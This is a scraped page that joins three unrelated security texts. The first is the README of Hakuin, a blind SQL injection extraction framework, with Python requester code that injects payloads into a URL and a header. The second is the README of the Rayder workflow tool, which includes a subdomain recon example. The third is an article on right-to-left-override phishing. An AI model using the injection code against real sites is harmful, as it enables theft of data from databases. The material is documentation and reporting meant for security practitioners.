Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them parallelly if the commands do not depend on each other.
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
go install github.com/devanshbatham/rayder@v0.0.4
Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:
rayder -w path/to/workflow.yaml
A workflow is defined in a YAML file with the following structure:
vars:
VAR_NAME: value
# Add more variables...
parallel: true|false
modules:
- name: task-name
cmds:
- command-1
- command-2
# Add more commands...
silent: true|false
# Add more modules...
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars
section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}
).
To define variables, add them to the vars
section of your workflow YAML file:
vars:
VAR_NAME: value
ANOTHER_VAR: another_value
# Add more variables...
You can reference variables within your command strings using double curly braces ({{}}
). For example, if you defined a variable OUTPUT_DIR
, you can use it like this:
modules:
- name: example-task
cmds:
- echo "Output directory {{OUTPUT_DIR}}"
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value
to provide values for specific variables. For example:
rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars
section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
vars:
ORG: "example.org"
OUTPUT_DIR: "results"
modules:
- name: example-task
cmds:
- echo "Organization {{ORG}}"
- echo "Output directory {{OUTPUT_DIR}}"
When executing the workflow, you can provide values for ORG
and OUTPUT_DIR
via the command line like this:
rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir
This will override the default values and use the provided values for these variables.
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
vars:
ORG: "Acme, Inc"
OUTPUT_DIR: "results-dir"
parallel: false
modules:
- name: reverse-whois
silent: false
cmds:
- mkdir -p {{OUTPUT_DIR}}
- revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt
- name: finding-subdomains
cmds:
- xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
silent: false
- name: cleaning-subdomains
cmds:
- cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
- rm *.out
silent: true
- name: resolving-subdomains
cmds:
- cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
silent: false
- name: checking-alive-subdomains
cmds:
- cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 0 -o {{OUTPUT_DIR}}/alive-subdomains.txt
silent: false
To execute the above workflow, run the following command:
rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results
The parallel
field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel
to true
allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false
, modules will execute one after another.
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration of this project comes from Awesome taskfile project.
One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.
KrebsOnSecurity recently heard from a reader who was puzzled over an email heβd just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from Microsoft 365 about messages that had failed to deliver.
The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of β.pdf,β but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.
The file included in this phishing scam uses whatβs known as a βright-to-left overrideβ or RLO character. RLO is a special character within unicode β an encoding system that allows computers to exchange information regardless of the language used β that supports languages written from right to left, such as Arabic and Hebrew.
Look carefully at the screenshot below and youβll notice that while Microsoft Windows says the file attached to the phishing message is named βlme.pdf,β the full filename is βfdp.emlβ spelled backwards. In essence, this is a .eml file β an electronic mail format or email saved in plain text β masquerading as a .PDF file.
βThe email came through Microsoft Office 365 with all the detections turned on and was not caught,β the reader continued. βWhen the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to β___fdp.eml.β One would think Microsoft would have had plenty of time by now to address this.β
Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasnβt a new trick.
Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the βRestore Messagesβ link there bounces you through an open redirect on LinkedIn before forwarding to the phishing webpage.
As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly Linkedinβs parent firm Microsoft).
The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.
In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.
According to the latest figures from Check Point Software, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.
An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.
If youβre unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually β ideally, using a browser bookmark to avoid potential typosquatting sites.